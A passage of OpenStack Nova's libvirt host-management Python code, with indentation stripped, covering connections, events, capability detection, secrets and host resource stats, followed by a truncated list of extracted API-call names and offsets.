msg = _("Connection to libvirt lost: %s") % reason
self._wrapped_conn = None
self._queue_conn_event_handler(False, msg)
def _event_emit_delayed(self, event):
"""Emit events - possibly delayed."""
def event_cleanup(gt, *args, **kwargs):
"""Callback function for greenthread. Called
to cleanup the _events_delayed dictionary when an event
was called.
"""
event = args[0]
self._events_delayed.pop(event.uuid, None)
# Cleanup possible delayed stop events.
if event.uuid in self._events_delayed.keys():
self._events_delayed[event.uuid].cancel()
self._events_delayed.pop(event.uuid, None)
LOG.debug("Removed pending event for %s due to "
"lifecycle event", event.uuid)
if event.transition == virtevent.EVENT_LIFECYCLE_STOPPED:
# Delay STOPPED event, as they may be followed by a STARTED
# event in case the instance is rebooting
id_ = greenthread.spawn_after(self._lifecycle_delay,
self._event_emit, event)
self._events_delayed[event.uuid] = id_
# add callback to cleanup self._events_delayed dict after
# event was called
id_.link(event_cleanup, event)
else:
self._event_emit(event)
def _event_emit(self, event):
if self._lifecycle_event_handler is not None:
self._lifecycle_event_handler(event)
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0.
"""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug("Starting native event thread")
self._event_thread = native_threading.Thread(
target=self._native_thread)
self._event_thread.setDaemon(True)
self._event_thread.start()
LOG.debug("Starting green dispatch thread")
utils.spawn(self._dispatch_thread)
def _get_new_connection(self):
# call with _wrapped_conn_lock held
LOG.debug('Connecting to libvirt: %s', self._uri)
# This will raise an exception on failure
wrapped_conn = self._connect(self._uri, self._read_only)
try:
LOG.debug("Registering for lifecycle events %s", self)
wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
except Exception as e:
LOG.warning("URI %(uri)s does not support events: %(error)s",
{'uri': self._uri, 'error': e})
try:
LOG.debug("Registering for connection events: %s", str(self))
wrapped_conn.registerCloseCallback(self._close_callback, None)
except libvirt.libvirtError as e:
LOG.warning("URI %(uri)s does not support connection"
" events: %(error)s",
{'uri': self._uri, 'error': e})
return wrapped_conn
def _queue_conn_event_handler(self, *args, **kwargs):
if self._conn_event_handler is None:
return
def handler():
return self._conn_event_handler(*args, **kwargs)
self._conn_event_handler_queue.put(handler)
def _get_connection(self):
# multiple concurrent connections are protected by _wrapped_conn_lock
with self._wrapped_conn_lock:
# Drop the existing connection if it is not usable
if (self._wrapped_conn is not None and
not self._test_connection(self._wrapped_conn)):
self._wrapped_conn = None
# Connection was previously up, and went down
self._queue_conn_event_handler(
False, _('Connection to libvirt lost'))
if self._wrapped_conn is None:
try:
# This will raise if it fails to get a connection
self._wrapped_conn = self._get_new_connection()
except Exception as ex:
with excutils.save_and_reraise_exception():
# If we previously had a connection and it went down,
# we generated a down event for that above.
# We also want to generate a down event for an initial
# failure, which won't be handled above.
if self._initial_connection:
self._queue_conn_event_handler(
False,
_('Failed to connect to libvirt: %(msg)s') %
{'msg': ex})
finally:
self._initial_connection = False
self._queue_conn_event_handler(True, None)
return self._wrapped_conn
def get_connection(self):
"""Returns a connection to the hypervisor
This method should be used to create and return a well
configured connection to the hypervisor.
:returns: a libvirt.virConnect object
"""
try:
conn = self._get_connection()
except libvirt.libvirtError as ex:
LOG.exception("Connection to libvirt failed: %s", ex)
payload = {'ip': CONF.my_ip, 'method': '_connect', 'reason': ex}
ctxt = nova_context.get_admin_context()
rpc.get_notifier('compute').error(ctxt,
'compute.libvirt.error',
payload)
compute_utils.notify_about_libvirt_connect_error(
ctxt, ip=CONF.my_ip, exception=ex)
raise exception.HypervisorUnavailable()
return conn
@staticmethod
def _libvirt_error_handler(context, err):
# Just ignore instead of default outputting to stderr.
pass
def initialize(self):
if self._initialized:
return
# NOTE(dkliban): Error handler needs to be registered before libvirt
# connection is used for the first time. Otherwise, the
# handler does not get registered.
libvirt.registerErrorHandler(self._libvirt_error_handler, None)
libvirt.virEventRegisterDefaultImpl()
self._init_events()
LOG.debug("Starting connection event dispatch thread")
utils.spawn(self._conn_event_thread)
self._initialized = True
def _version_check(self, lv_ver=None, hv_ver=None, hv_type=None,
op=operator.lt):
"""Check libvirt version, hypervisor version, and hypervisor type
:param hv_type: hypervisor driver from the top of this file.
"""
conn = self.get_connection()
try:
if lv_ver is not None:
libvirt_version = conn.getLibVersion()
if op(libvirt_version,
versionutils.convert_version_to_int(lv_ver)):
return False
if hv_ver is not None:
hypervisor_version = conn.getVersion()
if op(hypervisor_version,
versionutils.convert_version_to_int(hv_ver)):
return False
if hv_type is not None:
hypervisor_type = conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.lt)
def has_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.ne)
def get_guest(self, instance):
"""Retrieve libvirt guest object for an instance.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
:param instance: a nova.objects.Instance object
:returns: a nova.virt.libvirt.Guest object
:raises exception.InstanceNotFound: The domain was not found
:raises exception.InternalError: A libvirt error occurred
"""
return libvirt_guest.Guest(self._get_domain(instance))
def _get_domain(self, instance):
"""Retrieve libvirt domain object for an instance.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
:param instance: a nova.objects.Instance object
:returns: a libvirt.Domain object
:raises exception.InstanceNotFound: The domain was not found
:raises exception.InternalError: A libvirt error occurred
"""
try:
conn = self.get_connection()
return conn.lookupByUUIDString(instance.uuid)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance.uuid)
msg = (_('Error from libvirt while looking up %(instance_name)s: '
'[Error Code %(error_code)s] %(ex)s') %
{'instance_name': instance.name,
'error_code': error_code,
'ex': ex})
raise exception.InternalError(msg)
def list_guests(self, only_running=True, only_guests=True):
"""Get a list of Guest objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
See method "list_instance_domains" for more information.
:returns: list of Guest objects
"""
return [libvirt_guest.Guest(dom) for dom in self.list_instance_domains(
only_running=only_running, only_guests=only_guests)]
def list_instance_domains(self, only_running=True, only_guests=True):
"""Get a list of libvirt.Domain objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
Query libvirt to a get a list of all libvirt.Domain objects
that correspond to nova instances. If the only_running parameter
is true this list will only include active domains, otherwise
inactive domains will be included too. If the only_guests parameter
is true the list will have any "host" domain (aka Xen Domain-0)
filtered out.
:returns: list of libvirt.Domain objects
"""
flags = libvirt.VIR_CONNECT_LIST_DOMAINS_ACTIVE
if not only_running:
flags = flags | libvirt.VIR_CONNECT_LIST_DOMAINS_INACTIVE
# listAllDomains() returns <list of virDomain>, not <virDomain>, so
# tpool.Proxy's autowrap won't catch it. We need to wrap the
# contents of the list we return.
alldoms = (self._wrap_libvirt_proxy(dom)
for dom in self.get_connection().listAllDomains(flags))
doms = []
for dom in alldoms:
if only_guests and dom.ID() == 0:
continue
doms.append(dom)
return doms
def get_online_cpus(self):
"""Get the set of CPUs that are online on the host
:returns: set of online CPUs, raises libvirtError on error
"""
cpus, cpu_map, online = self.get_connection().getCPUMap()
online_cpus = set()
for cpu in range(cpus):
if cpu_map[cpu]:
online_cpus.add(cpu)
return online_cpus
def get_cpu_model_names(self):
"""Get the cpu models based on host CPU arch
:returns: a list of cpu models which supported by the given CPU arch
"""
arch = self.get_capabilities().host.cpu.arch
return self.get_connection().getCPUModelNames(arch)
@staticmethod
def _log_host_capabilities(xmlstr):
# NOTE(mriedem): This looks a bit weird but we do this so we can stub
# out this method in unit/functional test runs since the xml string is
# big and it can cause subunit parsing to fail (see bug 1813147).
LOG.info("Libvirt host capabilities %s", xmlstr)
def get_capabilities(self):
"""Returns the host capabilities information
Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host.
Note: The result is cached in the member attribute _caps.
:returns: a config.LibvirtConfigCaps object
"""
if not self._caps:
xmlstr = self.get_connection().getCapabilities()
self._log_host_capabilities(xmlstr)
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
# NOTE(mriedem): Don't attempt to get baseline CPU features
# if libvirt can't determine the host cpu model.
if (hasattr(libvirt,
'VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES') and
self._caps.host.cpu.model is not None):
try:
xml_str = self._caps.host.cpu.to_xml()
if six.PY3 and isinstance(xml_str, six.binary_type):
xml_str = xml_str.decode('utf-8')
features = self.get_connection().baselineCPU(
[xml_str],
libvirt.VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES)
if features:
cpu = vconfig.LibvirtConfigCPU()
cpu.parse_str(features)
self._caps.host.cpu.features = cpu.features
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warning("URI %(uri)s does not support full set"
" of host capabilities: %(error)s",
{'uri': self._uri, 'error': ex})
else:
raise
return self._caps
def get_domain_capabilities(self):
"""Returns the capabilities you can request when creating a
domain (VM) with that hypervisor, for various combinations of
architecture and machine type.
In this context the fuzzy word "hypervisor" implies QEMU
binary, libvirt itself and the host config. libvirt provides
this in order that callers can determine what the underlying
emulator and/or libvirt is capable of, prior to creating a domain
(for instance via virDomainCreateXML or virDomainDefineXML).
However nova needs to know the capabilities much earlier, when
the host's compute service is first initialised, in order that
placement decisions can be made across many compute hosts.
Therefore this is expected to be called during the init_host()
phase of the driver lifecycle rather than just before booting
an instance.
This causes an additional complication since the Python
binding for this libvirt API call requires the architecture
and machine type to be provided. So in order to gain a full
picture of the hypervisor's capabilities, technically we need
to call it with the right parameters, once for each
(architecture, machine_type) combination which we care about.
However the libvirt experts have advised us that in practice
the domain capabilities do not (yet, at least) vary enough
across machine types to justify the cost of calling
getDomainCapabilities() once for every single (architecture,
machine_type) combination. In particular, SEV support isn't
reported per-machine type, and since there are usually many
machine types, we heed the advice of the experts that it's
typically sufficient to call it once per host architecture:
https://bugzilla.redhat.com/show_bug.cgi?id=1683471#c7
However, that's not quite sufficient in the context of nova,
because SEV guests typically require a q35 machine type, as do
KVM/QEMU guests that want Secure Boot, whereas the current
default machine type for x86_64 is 'pc'. So we need results
from the getDomainCapabilities API for at least those two.
Fortunately we can take advantage of the results from the
getCapabilities API which marks selected machine types as
canonical, e.g.:
<machine canonical='pc-i440fx-2.11' maxCpus='255'>pc</machine>
<machine canonical='pc-q35-2.11' maxCpus='288'>q35</machine>
So for now, we call getDomainCapabilities for these canonical
machine types of each architecture, plus for the
architecture's default machine type, if that is not one of the
canonical types.
Future domain capabilities might report SEV in a more
fine-grained manner, and we also expect to use this method to
detect other features, such as for gracefully handling machine
types and potentially for detecting OVMF binaries. Therefore
we memoize the results of the API calls in a nested dict where
the top-level keys are architectures, and second-level keys
are machine types, in order to allow easy expansion later.
Whenever libvirt/QEMU are updated, cached domCapabilities
would get outdated (because QEMU will contain new features and
the capabilities will vary). However, this should not be a
problem here, because when libvirt/QEMU gets updated, the
nova-compute agent also needs restarting, at which point the
memoization will vanish because it's not persisted to disk.
Note: The result is cached in the member attribute
_domain_caps.
:returns: a nested dict of dicts which maps architectures to
machine types to instances of config.LibvirtConfigDomainCaps
representing the domain capabilities of the host for that arch
and machine type:
{ arch:
{ machine_type: LibvirtConfigDomainCaps }
}
"""
if self._domain_caps:
return self._domain_caps
domain_caps: ty.Dict = defaultdict(dict)
caps = self.get_capabilities()
virt_type = CONF.libvirt.virt_type
for guest in caps.guests:
arch = guest.arch
domain = guest.domains.get(virt_type, guest.default_domain)
for machine_type in self._get_machine_types(arch, domain):
# It is expected that if there are multiple <guest>
# elements, each will have a different architecture;
# for example, on x86 hosts one <guest> will contain
# <arch name='i686'> and one will contain <arch
# name='x86_64'>. But it doesn't hurt to add a safety
# net to avoid needlessly calling libvirt's API more
# times than we need.
if machine_type and machine_type in domain_caps[arch]:
continue
self._add_to_domain_capabilities(domain.emulator, arch,
domain_caps, machine_type,
virt_type)
# NOTE(aspiers): Use a temporary variable to update the
# instance variable atomically, otherwise if some API
# calls succeeded and then one failed, we might
# accidentally memoize a partial result.
self._domain_caps = domain_caps
return self._domain_caps
def _get_machine_types(self, arch, domain):
"""Get the machine types for this architecture for which we need to
call getDomainCapabilities, i.e. the canonical machine types,
and the default machine type (if it's not one of the canonical
machine types).
See the docstring for get_domain_capabilities() for an explanation
of why we choose this set of machine types.
"""
# NOTE(aspiers): machine_type could be None here if nova
# doesn't have a default machine type for this architecture.
# See _add_to_domain_capabilities() below for how this is handled.
mtypes = set([libvirt_utils.get_default_machine_type(arch)])
mtypes.update(domain.aliases.keys())
LOG.debug("Getting domain capabilities for %(arch)s via "
"machine types: %(mtypes)s",
{'arch': arch, 'mtypes': mtypes})
return mtypes
def _add_to_domain_capabilities(self, emulator_bin, arch, domain_caps,
machine_type, virt_type):
# NOTE(aspiers): machine_type could be None here if nova
# doesn't have a default machine type for this architecture.
# In that case we pass a machine_type of None to the libvirt
# API and rely on it choosing a sensible default which will be
# returned in the <machine> element. It could also be an
# alias like 'pc' rather than a full machine type.
#
# NOTE(kchamart): Prior to libvirt v4.7.0 libvirt picked its
# default machine type for x86, 'pc', as reported by QEMU's
# default. From libvirt v4.7.0 onwards, libvirt _explicitly_
# declared the "preferred" default for x86 as 'pc' (and
# appropriate values for other architectures), and only uses
# QEMU's reported default (whatever that may be) if 'pc' does
# not exist. This was done "to isolate applications from
# hypervisor changes that may cause incompatibilities" --
# i.e. if, or when, QEMU changes its default machine type to
# something else. Refer to this libvirt commit:
#
# https://libvirt.org/git/?p=libvirt.git;a=commit;h=26cfb1a3
try:
cap_obj = self._get_domain_capabilities(
emulator_bin=emulator_bin, arch=arch,
machine_type=machine_type, virt_type=virt_type)
except libvirt.libvirtError as ex:
# NOTE(sean-k-mooney): This can happen for several
# reasons, but one common example is if you have
# multiple QEMU emulators installed and you set
# virt-type=kvm. In this case any non-native emulator,
# e.g. AArch64 on an x86 host, will (correctly) raise
# an exception as KVM cannot be used to accelerate CPU
# instructions for non-native architectures.
error_code = ex.get_error_code()
LOG.debug(
"Error from libvirt when retrieving domain capabilities "
"for arch %(arch)s / virt_type %(virt_type)s / "
"machine_type %(mach_type)s: "
"[Error Code %(error_code)s]: %(exception)s",
{'arch': arch, 'virt_type': virt_type,
'mach_type': machine_type, 'error_code': error_code,
'exception': ex})
# Remove archs added by default dict lookup when checking
# if the machine type has already been recoded.
if arch in domain_caps:
domain_caps.pop(arch)
return
# Register the domain caps using the expanded form of
# machine type returned by libvirt in the <machine>
# element (e.g. pc-i440fx-2.11)
if cap_obj.machine_type:
domain_caps[arch][cap_obj.machine_type] = cap_obj
else:
# NOTE(aspiers): In theory this should never happen,
# but better safe than sorry.
LOG.warning(
"libvirt getDomainCapabilities("
"emulator_bin=%(emulator_bin)s, arch=%(arch)s, "
"machine_type=%(machine_type)s, virt_type=%(virt_type)s) "
"returned null <machine> type",
{'emulator_bin': emulator_bin, 'arch': arch,
'machine_type': machine_type, 'virt_type': virt_type}
)
# And if we passed an alias, register the domain caps
# under that too.
if machine_type and machine_type != cap_obj.machine_type:
domain_caps[arch][machine_type] = cap_obj
cap_obj.machine_type_alias = machine_type
def _get_domain_capabilities(self, emulator_bin=None, arch=None,
machine_type=None, virt_type=None, flags=0):
xmlstr = self.get_connection().getDomainCapabilities(
emulator_bin,
arch,
machine_type,
virt_type,
flags
)
LOG.debug("Libvirt host hypervisor capabilities for arch=%s and "
"machine_type=%s:\n%s", arch, machine_type, xmlstr)
caps = vconfig.LibvirtConfigDomainCaps()
caps.parse_str(xmlstr)
return caps
def get_driver_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self.get_connection().getType()
def get_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
return self.get_connection().getVersion()
def get_hostname(self):
"""Returns the hostname of the hypervisor."""
hostname = self.get_connection().getHostname()
if self._hostname is None:
self._hostname = hostname
elif hostname != self._hostname:
LOG.error('Hostname has changed from %(old)s '
'to %(new)s. A restart is required to take effect.',
{'old': self._hostname, 'new': hostname})
return self._hostname
def find_secret(self, usage_type, usage_id):
"""Find a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
if usage_type == 'iscsi':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_ISCSI
elif usage_type in ('rbd', 'ceph'):
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_CEPH
elif usage_type == 'volume':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_VOLUME
else:
msg = _("Invalid usage_type: %s")
raise exception.InternalError(msg % usage_type)
try:
conn = self.get_connection()
return conn.secretLookupByUsage(usage_type_const, usage_id)
except libvirt.libvirtError as e:
if e.get_error_code() == libvirt.VIR_ERR_NO_SECRET:
return None
def create_secret(self, usage_type, usage_id, password=None, uuid=None):
"""Create a secret.
:param usage_type: one of 'iscsi', 'ceph', 'rbd', 'volume', 'vtpm'.
'rbd' will be converted to 'ceph'. 'vtpm' secrets
are private and ephemeral; others are not.
:param usage_id: name of resource in secret
:param password: <PASSWORD>
:param uuid: optional UUID of the secret; else one is generated by
libvirt
"""
secret_conf = vconfig.LibvirtConfigSecret()
secret_conf.ephemeral = usage_type == 'vtpm'
secret_conf.private = usage_type == 'vtpm'
secret_conf.usage_id = usage_id
secret_conf.uuid = uuid
if usage_type in ('rbd', 'ceph'):
secret_conf.usage_type = 'ceph'
elif usage_type == 'iscsi':
secret_conf.usage_type = 'iscsi'
elif usage_type == 'volume':
secret_conf.usage_type = 'volume'
elif usage_type == 'vtpm':
secret_conf.usage_type = 'vtpm'
else:
msg = _("Invalid usage_type: %s")
raise exception.InternalError(msg % usage_type)
xml = secret_conf.to_xml()
try:
LOG.debug('Secret XML: %s', xml)
conn = self.get_connection()
secret = conn.secretDefineXML(xml)
if password is not None:
secret.setValue(password)
return secret
except libvirt.libvirtError:
with excutils.save_and_reraise_exception():
LOG.error('Error defining a secret with XML: %s', xml)
def delete_secret(self, usage_type, usage_id):
"""Delete a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
secret = self.find_secret(usage_type, usage_id)
if secret is not None:
secret.undefine()
def _get_hardware_info(self):
"""Returns hardware information about the Node.
Note that the memory size is reported in MiB instead of KiB.
"""
return self.get_connection().getInfo()
def get_memory_mb_total(self):
"""Get the total memory size(MB) of physical computer.
:returns: the total amount of memory(MB).
"""
if CONF.libvirt.file_backed_memory > 0:
return CONF.libvirt.file_backed_memory
else:
return self._get_hardware_info()[1]
def _sum_domain_memory_mb(self, include_host=True):
"""Get the total memory consumed by guest domains
If include_host is True, subtract available host memory from guest 0
to get real used memory within dom0 within xen
"""
used = 0
for guest in self.list_guests(only_guests=False):
try:
# TODO(sahid): Use get_info...
dom_mem = int(guest._get_domain_info()[2])
except libvirt.libvirtError as e:
LOG.warning("couldn't obtain the memory from domain:"
" %(uuid)s, exception: %(ex)s",
{"uuid": guest.uuid, "ex": e})
continue
if include_host and guest.id == 0:
# Memory usage for the host domain (dom0 in xen) is the
# reported memory minus available memory
used += (dom_mem - self._get_avail_memory_kb())
else:
used += dom_mem
# Convert it to MB
return used // units.Ki
@staticmethod
def _get_avail_memory_kb():
with open('/proc/meminfo') as fp:
m = fp.read().split()
idx1 = m.index('MemFree:')
idx2 = m.index('Buffers:')
idx3 = m.index('Cached:')
avail = int(m[idx1 + 1]) + int(m[idx2 + 1]) + int(m[idx3 + 1])
return avail
def get_memory_mb_used(self):
"""Get the used memory size(MB) of physical computer.
:returns: the total usage of memory(MB).
"""
if CONF.libvirt.virt_type == 'xen':
# For xen, report the sum of all domains, with
return self._sum_domain_memory_mb(include_host=True)
elif CONF.libvirt.file_backed_memory > 0:
# For file_backed_memory, report the total usage of guests,
# ignoring host memory
return self._sum_domain_memory_mb(include_host=False)
else:
return (self.get_memory_mb_total() -
(self._get_avail_memory_kb() // units.Ki))
def get_cpu_stats(self):
"""Returns the current CPU state of the host with frequency."""
stats = self.get_connection().getCPUStats(
libvirt.VIR_NODE_CPU_STATS_ALL_CPUS, 0)
# getInfo() returns various information about the host node
# No. 3 is the expected CPU frequency.
stats["frequency"] = self._get_hardware_info()[3]
return stats
def write_instance_config(self, xml):
"""Defines a domain, but does not start it.
:param xml: XML domain definition of the guest.
:returns: an instance of Guest
"""
if six.PY2:
xml = encodeutils.safe_encode(xml)
domain = self.get_connection().defineXML(xml)
return libvirt_guest.Guest(domain)
def device_lookup_by_name(self, name):
"""Lookup a node device by its name.
:returns: a virNodeDevice instance
"""
return self.get_connection().nodeDeviceLookupByName(name)
def list_pci_devices(self, flags=0):
"""Lookup pci devices.
:returns: a list of virNodeDevice instance
"""
return self._list_devices("pci", flags=flags)
def list_mdev_capable_devices(self, flags=0):
"""Lookup devices supporting mdev capabilities.
:returns: a list of virNodeDevice instance
"""
return self._list_devices("mdev_types", flags=flags)
def list_mediated_devices(self, flags=0):
"""Lookup mediated devices.
:returns: a list of virNodeDevice instance
"""
return self._list_devices("mdev", flags=flags)
def _list_devices(self, cap, flags=0):
"""Lookup devices.
:returns: a list of virNodeDevice instance
"""
try:
return self.get_connection().listDevices(cap, flags)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warning("URI %(uri)s does not support "
"listDevices: %(error)s",
{'uri': self._uri, 'error': ex})
return []
else:
raise
def list_all_devices(
self, flags: int = 0) -> ty.List['libvirt.virNodeDevice']:
"""Lookup devices.
:param flags: a bitmask of flags to filter the returned devices.
:returns: a list of virNodeDevice xml strings.
"""
try:
return self.get_connection().listAllDevices(flags) or []
except libvirt.libvirtError as ex:
LOG.warning(ex)
return []
def compare_cpu(self, xmlDesc, flags=0):
"""Compares the given CPU description with the host CPU."""
return self.get_connection().compareCPU(xmlDesc, flags)
def is_cpu_control_policy_capable(self):
"""Returns whether kernel configuration CGROUP_SCHED is enabled
CONFIG_CGROUP_SCHED may be disabled in some kernel configs to
improve scheduler latency.
"""
try:
with open("/proc/self/mounts", "r") as fd:
for line in fd.readlines():
# mount options and split options
bits = line.split()[3].split(",")
if "cpu" in bits:
return True
return False
except IOError:
return False
@property
def has_hyperthreading(self):
"""Determine if host CPU has SMT, a.k.a. HyperThreading.
:return: True if the host has SMT enabled, else False.
"""
if self._has_hyperthreading is not None:
return self._has_hyperthreading
self._has_hyperthreading = False
# we don't use '/capabilities/host/cpu/topology' since libvirt doesn't
# guarantee the accuracy of this information
for cell in self.get_capabilities().host.topology.cells:
if any(len(cpu.siblings) > 1 for cpu in cell.cpus if cpu.siblings):
self._has_hyperthreading = True
break
return self._has_hyperthreading
def _kernel_supports_amd_sev(self):
if not os.path.exists(SEV_KERNEL_PARAM_FILE):
LOG.debug("%s does not exist", SEV_KERNEL_PARAM_FILE)
return False
with open(SEV_KERNEL_PARAM_FILE) as f:
contents = f.read()
LOG.debug("%s contains [%s]", SEV_KERNEL_PARAM_FILE, contents)
return contents == "1\n"
@property
def supports_amd_sev(self):
"""Returns a boolean indicating whether AMD SEV (Secure Encrypted
Virtualization) is supported. This is conditional on support
in the hardware, kernel, qemu, and libvirt.
The result is memoized, since it is not expected to change
during the lifetime of a running nova-compute service; if the
hypervisor stack is changed or reconfigured in a way which
would affect the support, nova-compute should be restarted
anyway.
"""
if self._supports_amd_sev is None:
self._set_amd_sev_support()
return self._supports_amd_sev
def _set_amd_sev_support(self):
self._supports_amd_sev = False
if not self._kernel_supports_amd_sev():
LOG.info("kernel doesn't support AMD SEV")
self._supports_amd_sev = False
return
domain_caps = self.get_domain_capabilities()
for arch in domain_caps:
for machine_type in domain_caps[arch]:
LOG.debug("Checking SEV support for arch %s "
"and machine type %s", arch, machine_type)
for feature in domain_caps[arch][machine_type].features:
feature_is_sev = isinstance(
feature, vconfig.LibvirtConfigDomainCapsFeatureSev)
if (feature_is_sev and feature.supported):
LOG.info("AMD SEV support detected")
self._supports_amd_sev = True
return
LOG.debug("No AMD SEV support detected for any (arch, machine_type)")
| [
"libvirt.virEventRegisterDefaultImpl",
"nova.virt.libvirt.config.LibvirtConfigCaps",
"nova.virt.libvirt.utils.get_default_machine_type",
"oslo_utils.importutils.import_module",
"nova.utils.spawn",
"nova.compute.utils.notify_about_libvirt_connect_error",
"nova.i18n._",
"nova.virt.libvirt.config.Libvirt... | [((2186, 2213), 'oslo_log.log.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (2203, 2213), True, 'from oslo_log import log as logging\n'), ((2231, 2257), 'eventlet.patcher.original', 'patcher.original', (['"""socket"""'], {}), "('socket')\n", (2247, 2257), False, 'from eventlet import patcher\n'), ((2277, 2306), 'eventlet.patcher.original', 'patcher.original', (['"""threading"""'], {}), "('threading')\n", (2293, 2306), False, 'from eventlet import patcher\n'), ((2322, 2371), 'eventlet.patcher.original', 'patcher.original', (["('Queue' if six.PY2 else 'queue')"], {}), "('Queue' if six.PY2 else 'queue')\n", (2338, 2371), False, 'from eventlet import patcher\n'), ((3149, 3162), 'queue.Queue', 'queue.Queue', ([], {}), '()\n', (3160, 3162), False, 'import queue\n'), ((3386, 3402), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (3400, 3402), False, 'import threading\n'), ((4571, 4622), 'inspect.getmembers', 'inspect.getmembers', (['libvirt_module', 'inspect.isclass'], {}), '(libvirt_module, inspect.isclass)\n', (4589, 4622), False, 'import inspect\n'), ((5358, 5412), 'eventlet.tpool.Proxy', 'tpool.Proxy', (['obj'], {'autowrap': 'self._libvirt_proxy_classes'}), '(obj, autowrap=self._libvirt_proxy_classes)\n', (5369, 5412), False, 'from eventlet import tpool\n'), ((16503, 16537), 'nova.utils.spawn', 'utils.spawn', (['self._dispatch_thread'], {}), '(self._dispatch_thread)\n', (16514, 16537), False, 'from nova import utils\n'), ((20830, 20893), 'libvirt.registerErrorHandler', 'libvirt.registerErrorHandler', (['self._libvirt_error_handler', 'None'], {}), '(self._libvirt_error_handler, None)\n', (20858, 20893), False, 'import libvirt\n'), ((20902, 20939), 'libvirt.virEventRegisterDefaultImpl', 'libvirt.virEventRegisterDefaultImpl', ([], {}), '()\n', (20937, 20939), False, 'import libvirt\n'), ((21040, 21076), 'nova.utils.spawn', 'utils.spawn', (['self._conn_event_thread'], {}), '(self._conn_event_thread)\n', (21051, 21076), False, 'from nova import utils\n'), ((33225, 33242), 'collections.defaultdict', 'defaultdict', (['dict'], {}), '(dict)\n', (33236, 33242), False, 'from collections import defaultdict\n'), ((39738, 39771), 'nova.virt.libvirt.config.LibvirtConfigDomainCaps', 'vconfig.LibvirtConfigDomainCaps', ([], {}), '()\n', (39769, 39771), True, 'from nova.virt.libvirt import config as vconfig\n'), ((42091, 42120), 'nova.virt.libvirt.config.LibvirtConfigSecret', 'vconfig.LibvirtConfigSecret', ([], {}), '()\n', (42118, 42120), True, 'from nova.virt.libvirt import config as vconfig\n'), ((46863, 46890), 'nova.virt.libvirt.guest.Guest', 'libvirt_guest.Guest', (['domain'], {}), '(domain)\n', (46882, 46890), True, 'from nova.virt.libvirt import guest as libvirt_guest\n'), ((2878, 2914), 'oslo_utils.importutils.import_module', 'importutils.import_module', (['"""libvirt"""'], {}), "('libvirt')\n", (2903, 2914), False, 'from oslo_utils import importutils\n'), ((5982, 6014), 'libvirt.virEventRunDefaultImpl', 'libvirt.virEventRunDefaultImpl', ([], {}), '()\n', (6012, 6014), False, 'import libvirt\n'), ((14256, 14327), 'eventlet.greenthread.spawn_after', 'greenthread.spawn_after', (['self._lifecycle_delay', 'self._event_emit', 'event'], {}), '(self._lifecycle_delay, self._event_emit, event)\n', (14279, 14327), False, 'from eventlet import greenthread\n'), ((15068, 15077), 'os.pipe', 'os.pipe', ([], {}), '()\n', (15075, 15077), False, 'import os\n'), ((15116, 15149), 'eventlet.greenio.GreenPipe', 'greenio.GreenPipe', (['wpipe', '"""wb"""', '(0)'], {}), "(wpipe, 'wb', 0)\n", (15133, 15149), False, 'from eventlet import greenio\n'), ((15188, 15221), 'eventlet.greenio.GreenPipe', 'greenio.GreenPipe', (['rpipe', '"""rb"""', '(0)'], {}), "(rpipe, 'rb', 0)\n", (15205, 15221), False, 'from eventlet import greenio\n'), ((24573, 24597), 'nova.virt.libvirt.guest.Guest', 'libvirt_guest.Guest', (['dom'], {}), '(dom)\n', (24592, 24597), True, 'from nova.virt.libvirt import guest as libvirt_guest\n'), ((27583, 27610), 'nova.virt.libvirt.config.LibvirtConfigCaps', 'vconfig.LibvirtConfigCaps', ([], {}), '()\n', (27608, 27610), True, 'from 